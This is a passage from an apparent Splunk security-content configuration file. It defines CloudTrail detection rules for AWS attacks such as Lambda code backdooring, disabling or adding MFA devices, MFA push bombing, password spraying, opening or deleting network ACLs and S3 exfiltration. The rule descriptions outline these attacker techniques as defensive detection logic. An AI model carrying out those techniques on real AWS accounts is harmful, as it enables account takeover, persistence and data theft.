search = `cloudtrail` eventName=DeletePolicy (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.policyArn) as policyArn by src user_arn eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_delete_policy_filter`

[ESCU - AWS IAM Failure Group Deletion - Rule]
action.escu = 0
action.escu.enabled = 1
description = This detection identifies failed attempts to delete groups. We want to identify when an attempt is made to delete a group but either access is denied, there is a conflict, or there is no such group. This may indicate administrators performing an action, but could also be suspicious behavior. Review parallel IAM events - recently added users, new groups and so forth.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This detection identifies failed attempts to delete groups. We want to identify when an attempt is made to delete a group but either access is denied, there is a conflict, or there is no such group. This may indicate administrators performing an action, but could also be suspicious behavior. Review parallel IAM events - recently added users, new groups and so forth.
action.escu.how_to_implement = The Splunk Add-on for AWS and the Splunk App for AWS are required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilities. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete groups (least privilege).
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS IAM Failure Group Deletion - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation"]
action.risk = 1
action.risk.param._risk_message = User $user_arn$ has had multiple failures while attempting to delete groups from $src$
action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 5}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS IAM Failure Group Deletion - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1098"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventSource=iam.amazonaws.com eventName=DeleteGroup errorCode IN (NoSuchEntityException, DeleteConflictException, AccessDenied) (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.groupName) as group_name by src eventName eventSource aws_account_id errorCode errorMessage userAgent eventID awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_failure_group_deletion_filter`

[ESCU - AWS IAM Successful Group Deletion - Rule]
action.escu = 0
action.escu.enabled = 1
description = The following query uses IAM events to track the successful deletion of a group on AWS. This is typically not indicative of malicious behavior, but a precursor to additional events that may unfold. Review parallel IAM events - recently added users, new groups and so forth. Conversely, review failed attempts in a similar manner.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1069.003", "T1098", "T1069"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = The following query uses IAM events to track the successful deletion of a group on AWS. This is typically not indicative of malicious behavior, but a precursor to additional events that may unfold. Review parallel IAM events - recently added users, new groups and so forth. Conversely, review failed attempts in a similar manner.
action.escu.how_to_implement = The Splunk Add-on for AWS and the Splunk App for AWS are required to utilize this data. The search requires AWS CloudTrail logs.
action.escu.known_false_positives = This detection will require tuning to provide high fidelity detection capabilities. Tune based on src addresses (corporate offices, VPN terminations) or by groups of users. Not every user with AWS access should have permission to delete groups (least privilege).
action.escu.creation_date = 2021-03-31 action.escu.modification_date = 2021-03-31 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS IAM Successful Group Deletion - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS IAM Privilege Escalation"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS IAM Successful Group Deletion - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation"], "cis20": ["CIS 10"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1069.003", "T1098", "T1069"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=iam.amazonaws.com eventName=DeleteGroup errorCode=success (userAgent!=*.amazonaws.com) | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.groupName) as group_deleted by src eventName eventSource errorCode user_agent awsRegion userIdentity.principalId user_arn | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_iam_successful_group_deletion_filter` [ESCU - AWS Lambda UpdateFunctionCode - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is designed to detect IAM users attempting to update/modify AWS lambda code via the AWS CLI to gain persistence, futher access into your AWS environment and to facilitate planting backdoors. 
In this instance, an attacker may upload malicious code/binary to a lambda function which will be executed automatically when the funnction is triggered. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This analytic is designed to detect IAM users attempting to update/modify AWS lambda code via the AWS CLI to gain persistence, futher access into your AWS environment and to facilitate planting backdoors. In this instance, an attacker may upload malicious code/binary to a lambda function which will be executed automatically when the funnction is triggered. action.escu.how_to_implement = You must install Splunk AWS Add on and enable Cloudtrail logs in your AWS Environment. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin or an autorized IAM user has updated the lambda fuction code legitimately. action.escu.creation_date = 2022-02-24 action.escu.modification_date = 2022-02-24 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Lambda UpdateFunctionCode - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["Suspicious Cloud User Activities"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Lambda UpdateFunctionCode - Rule action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud User Activities"], "cis20": ["CIS 10"], "confidence": 90, "impact": 70, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1204"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = 
number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventSource=lambda.amazonaws.com eventName=UpdateFunctionCode* errorCode = success user_type=IAMUser | stats count min(_time) as firstTime max(_time) as lastTime values(requestParameters.functionName) as function_updated by src_ip user_arn user_agent user_type eventName aws_account_id |`aws_lambda_updatefunctioncode_filter` [ESCU - AWS Multi-Factor Authentication Disabled - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. 
action.escu.known_false_positives = AWS Administrators may disable MFA but it is highly unlikely for this event to occur without prior notice to the company action.escu.creation_date = 2022-10-04 action.escu.modification_date = 2022-10-04 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multi-Factor Authentication Disabled - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ has disabled Multi-Factor authentication for AWS account $aws_account_id$ action.risk.param._risk = [{"risk_object_field": "aws_account_id", "risk_object_type": "other", "risk_score": 64}, {"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multi-Factor Authentication Disabled - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation", "Installation"], "mitre_attack": ["T1586", "T1586.003", "T1621", "T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies an attempt to disable multi-factor authentication for an AWS IAM user. 
An adversary who has obtained access to an AWS tenant may disable multi-factor authentication as a way to plant a backdoor and maintain persistence using a valid account. This way the attackers can keep persistance in the environment without adding new users. action.notable.param.rule_title = AWS Multi-Factor Authentication Disabled action.notable.param.security_domain = threat action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` (eventName= DeleteVirtualMFADevice OR eventName=DeactivateMFADevice) | stats count min(_time) as firstTime max(_time) as lastTime by src eventName eventSource aws_account_id userAgent eventID awsRegion user_name userIdentity.arn status | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_multi_factor_authentication_disabled_filter` [ESCU - AWS Multiple Failed MFA Requests For User - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies multiple failed multi-factor authentication requests to an AWS Console for a single user. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. AWS Environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. 
Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies multiple failed multi-factor authentication requests to an AWS Console for a single user. AWS Cloudtrail logs provide a a very useful field called `additionalEventData` that logs information regarding usage of MFA. Specifically, the analytic triggers when more than 10 MFA user prompts fail within 10 minutes. AWS Environments can be very different depending on the organization, Security teams should test this detection and customize these arbitrary thresholds. The detected behavior may represent an adversary who has obtained legitimate credentials for a user and continuously repeats login attempts in order to bombard users with MFA push notifications, SMS messages, and phone calls potentially resulting in the user finally accepting the authentication request. Threat actors like the Lapsus team and APT29 have leveraged this technique to bypass multi-factor authentication controls as reported by Mandiant and others. action.escu.how_to_implement = The Splunk AWS Add-on is required to utilize this data. The search requires AWS Cloudtrail logs. action.escu.known_false_positives = Multiple Failed MFA requests may also be a sign of authentication or application issues. Filter as needed. 
action.escu.creation_date = 2022-10-03 action.escu.modification_date = 2022-10-03 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multiple Failed MFA Requests For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = User $user_name$ is seen to have high number of MFA prompt failures within a short period of time. action.risk.param._risk = [{"risk_object_field": "user_name", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multiple Failed MFA Requests For User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Weaponization", "Exploitation"], "mitre_attack": ["T1586", "T1586.003", "T1621"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName= ConsoleLogin "additionalEventData.MFAUsed"=Yes errorMessage="Failed authentication" | bucket span=5m _time | stats dc(_raw) as mfa_prompts values(userAgent) as userAgent values(src) as src by _time user_name user_arn aws_account_id eventName errorMessage | where mfa_prompts > 10| `aws_multiple_failed_mfa_requests_for_user_filter` [ESCU - AWS Multiple Users Failing To Authenticate 
From Ip - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies one source Ip failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment tenant to obtain initial access or elevate privileges. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies one source Ip failing to authenticate into the AWS Console with 30 unique valid users within 10 minutes. This behavior could represent an adversary performing a Password Spraying attack against an AWS environment tenant to obtain initial access or elevate privileges. action.escu.how_to_implement = You must install Splunk Add-on for AWS in order to ingest Cloudtrail. We recommend the users to try different combinations of the bucket span time and the tried account threshold to tune this search according to their environment. action.escu.known_false_positives = No known false postives for this detection. 
Please review this alert action.escu.creation_date = 2022-09-27 action.escu.modification_date = 2022-09-27 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Multiple Users Failing To Authenticate From Ip - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover", "Compromised User Account"] action.risk = 1 action.risk.param._risk_message = Multiple failed console login attempts against users $tried_accounts$ seen from $src_ip$ action.risk.param._risk = [{"threat_object_field": "src_ip", "threat_object_type": "ip_address"}, {"risk_object_field": "tried_accounts", "risk_object_type": "user", "risk_score": 54}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Multiple Users Failing To Authenticate From Ip - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 90, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1110", "T1110.003", "T1110.004"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=ConsoleLogin action=failure | bucket span=10m _time | stats dc(user_name) AS unique_accounts values(user_name) as tried_accounts by _time, src_ip, eventName, action, user_agent | where unique_accounts > 30 |`aws_unusual_number_of_failed_authentications_from_ip_filter` [ESCU - AWS Network Access 
Control List Created with All Open Ports - Rule] action.escu = 0 action.escu.enabled = 1 description = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS, version 4.4.0 or later, and configure your AWS CloudTrail inputs. action.escu.known_false_positives = It's possible that an admin has created this ACL with all ports open for some legitimate purpose however, this should be scoped and not allowed in production environment. action.escu.creation_date = 2021-01-11 action.escu.modification_date = 2021-01-11 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Network Access Control List Created with All Open Ports - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ has created network ACLs with all the ports open to a specified CIDR $requestParameters.cidrBlock$ action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 48}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - 
AWS Network Access Control List Created with All Open Ports - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 80, "impact": 60, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The search looks for AWS CloudTrail events to detect if any network ACLs were created with all the ports open to a specified CIDR. action.notable.param.rule_title = AWS Network Access Control List Created with All Open Ports action.notable.param.security_domain = network action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol=-1 | append [search `cloudtrail` eventName=CreateNetworkAclEntry OR eventName=ReplaceNetworkAclEntry requestParameters.ruleAction=allow requestParameters.egress=false requestParameters.aclProtocol!=-1 | eval port_range='requestParameters.portRange.to' - 'requestParameters.portRange.from' | where port_range>1024] | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by userName user_arn userIdentity.principalId eventName requestParameters.ruleAction requestParameters.egress requestParameters.aclProtocol requestParameters.portRange.to requestParameters.portRange.from src userAgent requestParameters.cidrBlock | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_created_with_all_open_ports_filter` [ESCU - AWS Network Access Control List Deleted - Rule] action.escu = 0 action.escu.enabled = 1 description = 
Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs. action.escu.mappings = {"cis20": ["CIS 13"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = Enforcing network-access controls is one of the defensive mechanisms used by cloud administrators to restrict access to a cloud instance. After the attacker has gained control of the AWS console by compromising an admin account, they can delete a network ACL and gain access to the instance from anywhere. This search will query the AWS CloudTrail logs to detect users deleting network ACLs. action.escu.how_to_implement = You must install the AWS App for Splunk (version 5.1.0 or later) and Splunk Add-on for AWS (version 4.4.0 or later), then configure your AWS CloudTrail inputs. action.escu.known_false_positives = It's possible that a user has legitimately deleted a network ACL. 
action.escu.creation_date = 2021-01-12 action.escu.modification_date = 2021-01-12 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS Network Access Control List Deleted - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Network ACL Activity"] action.risk = 1 action.risk.param._risk_message = User $user_arn$ from $src$ has sucessfully deleted network ACLs entry (eventName= $eventName$), such that the instance is accessible from anywhere action.risk.param._risk = [{"threat_object_field": "src", "threat_object_type": "ip_address"}, {"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 5}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - AWS Network Access Control List Deleted - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Network ACL Activity"], "cis20": ["CIS 13"], "confidence": 50, "impact": 10, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1562.007", "T1562"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=DeleteNetworkAclEntry requestParameters.egress=false | fillnull | stats count min(_time) as firstTime max(_time) as lastTime by user_arn userIdentity.principalId eventName requestParameters.egress src userAgent | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `aws_network_access_control_list_deleted_filter` [ESCU - AWS New MFA Method Registered For User - Rule] action.escu = 0 
action.escu.enabled = 1 description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.escu.how_to_implement = You must install Splunk AWS add on and Splunk App for AWS. This search works when AWS CloudTrail logs. action.escu.known_false_positives = Newly onboarded users who are registering an MFA method for the first time will also trigger this detection. action.escu.creation_date = 2023-01-31 action.escu.modification_date = 2023-01-31 action.escu.confidence = high action.escu.full_search_name = ESCU - AWS New MFA Method Registered For User - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"] action.escu.analytic_story = ["AWS Identity and Access Management Account Takeover"] action.risk = 1 action.risk.param._risk_message = A new virtual device $virtualMFADeviceName$ is added to user $user_arn$ action.risk.param._risk = [{"risk_object_field": "user_arn", "risk_object_type": "user", "risk_score": 64}, {"threat_object_field": "src_ip", "threat_object_type": "ip_address"}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 
action.correlationsearch.label = ESCU - AWS New MFA Method Registered For User - Rule action.correlationsearch.annotations = {"analytic_story": ["AWS Identity and Access Management Account Takeover"], "cis20": ["CIS 10"], "confidence": 80, "impact": 80, "kill_chain_phases": ["Exploitation", "Installation"], "mitre_attack": ["T1556", "T1556.006"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic identifies the registration of a new Multi Factor authentication method for an AWS account. Adversaries who have obtained unauthorized access to an AWS account may register a new MFA method to maintain persistence. action.notable.param.rule_title = AWS New MFA Method Registered For User action.notable.param.security_domain = identity action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `cloudtrail` eventName=CreateVirtualMFADevice | stats count values(requestParameters.virtualMFADeviceName) as virtualMFADeviceName min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode userAgent eventID awsRegion userIdentity.principalId user_arn src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_new_mfa_method_registered_for_user_filter` [ESCU - AWS Password Policy Changes - Rule] action.escu = 0 action.escu.enabled = 1 description = This search looks for AWS CloudTrail events where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. 
These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = This search looks for AWS CloudTrail events where a user is making successful API calls to view/update/delete the existing password policy in an AWS organization. It is unlikely for a regular user to conduct this operation. These events may potentially be malicious, adversaries often use this information to gain more understanding of the password defenses in place and exploit them to increase their attack surface when a user account is compromised. action.escu.how_to_implement = You must install Splunk AWS Add on and Splunk App for AWS. This search works with AWS CloudTrail logs. action.escu.known_false_positives = While this search has no known false positives, it is possible that an AWS admin has legitimately triggered an AWS audit tool activity which may trigger this event. 
action.escu.creation_date = 2023-01-26
action.escu.modification_date = 2023-01-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS Password Policy Changes - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Amazon Web Services - Cloudtrail"]
action.escu.analytic_story = ["AWS IAM Privilege Escalation", "Compromised User Account"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - AWS Password Policy Changes - Rule
action.correlationsearch.annotations = {"analytic_story": ["AWS IAM Privilege Escalation", "Compromised User Account"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1201"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `cloudtrail` eventName IN ("UpdateAccountPasswordPolicy","GetAccountPasswordPolicy","DeleteAccountPasswordPolicy") errorCode=success | stats count values(eventName) as eventName values(userAgent) min(_time) as firstTime max(_time) as lastTime by eventSource aws_account_id errorCode awsRegion userIdentity.principalId user_arn src_ip | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `aws_password_policy_changes_filter`

[ESCU - AWS S3 Exfiltration Behavior Identified - Rule]
action.escu = 0
action.escu.enabled = 1
description = This correlation search looks at the risk events created by the detection analytics related to Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more unique AWS analytics and 2 or more distinct MITRE IDs have triggered for a particular risk object. When triggered, this alert may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]}
action.escu.data_models = ["Risk"]
action.escu.eli5 = This correlation search looks at the risk events created by the detection analytics related to Collection and Exfiltration techniques used by adversaries. The rule is designed to identify instances where 2 or more unique AWS analytics and 2 or more distinct MITRE IDs have triggered for a particular risk object. When triggered, this alert may indicate a potential exfiltration in progress. By aggregating these analytics, security teams can swiftly respond to and investigate any suspicious activities, enhancing their ability to protect critical assets and prevent unauthorized access to sensitive information.
action.escu.how_to_implement = You must enable all the detection searches in the Data Exfiltration Analytic story to create risk events in Enterprise Security.
action.escu.known_false_positives = False positives may be present based on automated tooling or system administrators. Filter as needed.
action.escu.creation_date = 2023-11-07
action.escu.modification_date = 2023-11-07
action.escu.confidence = high
action.escu.full_search_name = ESCU - AWS S3 Exfiltration Behavior Identified - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Suspicious Cloud Instance Activities", "Data Exfiltration"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - RIR - AWS S3 Exfiltration Behavior Identified - Rule
action.correlationsearch.annotations = {"analytic_story": ["Suspicious Cloud Instance Activities", "Data Exfiltration"], "cis20": ["CIS 10"], "confidence": 90, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1537"], "nist": ["DE.AE"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
